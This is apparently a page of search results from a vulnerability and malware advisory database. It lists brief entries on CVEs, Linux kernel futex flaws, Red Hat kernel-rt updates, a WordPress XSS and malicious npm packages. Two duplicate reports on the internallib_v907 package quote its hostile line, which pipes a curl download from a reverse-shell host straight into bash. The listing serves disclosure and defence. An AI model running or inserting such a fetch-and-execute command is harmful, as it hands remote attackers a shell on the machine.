82740 matches found
AWS-JDBC Wrapper: Privilege Escalation in Aurora PostgreSQL instance
Aurora PostgreSQL is a fully managed relational database engine that's compatible with PostgreSQL. The team has identified CVE-2026-11400, an issue in Aurora PostgreSQL using the AWS Advanced JDBC Wrapper Impact An issue in AWS Wrappers for Amazon Aurora PostgreSQL will allow for privilege...
CVE-2026-16017
A security flaw has been discovered in mosaxiv clawlet up to 0.2.10. Impacted is the function list/remove of the file tools/toolcron.go of the component cron Chat Tool. The manipulation results in missing authorization. The attack may be performed from remote. The exploit has been released to the...
kernel: futex/requeue: Prevent NULL pointer dereference in remove_waiter() on self-deadlock
A flaw was found in the Linux kernel's futex Fast Userspace Mutex requeue mechanism. When a non-top waiter attempts to requeue a Priority Inheritance PI futex it already owns, a NULL pointer dereference can occur. This issue, specifically within the removewaiter function during a self-deadlock...
Important: Red Hat Security Advisory: kernel-rt security update
An update for kernel-rt is now available for Red Hat Enterprise Linux 7 Extended Lifecycle Support. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System CVSS base score, which gives a detailed severity rating, is available...
WordPress MW Font Changer <=4.2.5 - Cross-Site Scripting
WordPress MW Font Changer plugin 4.2.5 and before contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication...
PT-2026-60768
A security flaw has been discovered in mosaxiv clawlet up to 0.2.10. Impacted is the function list/remove of the file tools/tool cron.go of the component cron Chat Tool. The manipulation results in missing authorization. The attack may be performed from remote. The exploit has been released to th...
kernel: rtmutex: Use waiter::task instead of current in remove_waiter()
A flaw was found in the Linux kernel. When the kernel's real-time mutex rtmutex component performs a specific operation called 'proxy-lock rollback' during futex requeue, it incorrectly handles task pointers. This can lead to a 'Use-After-Free' UAF vulnerability, where the system attempts to use...
MAL-2026-10696 Malicious code in loader1 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e9578c2db9f9fd58bb7b743e3ca8581aa21f4632bb965dcb53b7a4aaa02e5667 The package ships a single index.html declared as main whose only behavior is to fetch...
kernel: futex/requeue: Prevent NULL pointer dereference in remove_waiter() on self-deadlock
A flaw was found in the Linux kernel's futex Fast Userspace Mutex requeue mechanism. When a non-top waiter attempts to requeue a Priority Inheritance PI futex it already owns, a NULL pointer dereference can occur. This issue, specifically within the removewaiter function during a self-deadlock...
kernel: rtmutex: Use waiter::task instead of current in remove_waiter()
A flaw was found in the Linux kernel. When the kernel's real-time mutex rtmutex component performs a specific operation called 'proxy-lock rollback' during futex requeue, it incorrectly handles task pointers. This can lead to a 'Use-After-Free' UAF vulnerability, where the system attempts to use...
kernel: futex/requeue: Prevent NULL pointer dereference in remove_waiter() on self-deadlock
A flaw was found in the Linux kernel's futex Fast Userspace Mutex requeue mechanism. When a non-top waiter attempts to requeue a Priority Inheritance PI futex it already owns, a NULL pointer dereference can occur. This issue, specifically within the removewaiter function during a self-deadlock...
Malicious code in internallib_v907 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 40689180cd10e4352f018c9ffc96ddd110f12299bd83f195fe9879e28d1de59e index.js line 5 invokes exec'/bin/bash -c "curl https://reverse-shell.sh/... | sh"', piping a remote script directly into a shell. The fetched payloa...
MAL-2026-10691 Malicious code in internallib_v907 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 40689180cd10e4352f018c9ffc96ddd110f12299bd83f195fe9879e28d1de59e index.js line 5 invokes exec'/bin/bash -c "curl https://reverse-shell.sh/... | sh"', piping a remote script directly into a shell. The fetched payloa...
kernel: futex/requeue: Prevent NULL pointer dereference in remove_waiter() on self-deadlock
A flaw was found in the Linux kernel's futex Fast Userspace Mutex requeue mechanism. When a non-top waiter attempts to requeue a Priority Inheritance PI futex it already owns, a NULL pointer dereference can occur. This issue, specifically within the removewaiter function during a self-deadlock...
Moderate: Red Hat Security Advisory: kernel-rt security update
An update for kernel-rt is now available for Red Hat Enterprise Linux 9.2 Update Services for SAP Solutions. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System CVSS base score, which gives a detailed severity rating, is...
kernel: futex/requeue: Prevent NULL pointer dereference in remove_waiter() on self-deadlock
A flaw was found in the Linux kernel's futex Fast Userspace Mutex requeue mechanism. When a non-top waiter attempts to requeue a Priority Inheritance PI futex it already owns, a NULL pointer dereference can occur. This issue, specifically within the removewaiter function during a self-deadlock...
Malicious code in @fhkry/x-baileys (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector db9f6c3e5c391d9d3ffeb7f6c1b4154b0266efeb73bdf5543ad81f50236bdabc This package presents itself as a fork of @whiskeysockets/baileys impersonating the original author 'Adhiraj Singh' in package.json and exposing the...
MAL-2026-10665 Malicious code in @fhkry/x-baileys (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector db9f6c3e5c391d9d3ffeb7f6c1b4154b0266efeb73bdf5543ad81f50236bdabc This package presents itself as a fork of @whiskeysockets/baileys impersonating the original author 'Adhiraj Singh' in package.json and exposing the...
Malicious code in crypto-hasher (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5162012006c5d2576c6f93540445f10185d44acfb5cef39764f7a2b45c45d205 [email protected] impersonates the hash-wasm library. Its main entrypoint dist/index.umd.js injects code into the WASM Interface update method so...
Malicious code in ssweb-wp (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4cdc75de95852418c3d695299d52199b24e52202b2e5595089b3107a73c1e86b The package was found to contain malicious code or consuming dependency that contains malicious code Source: ghsa-malware...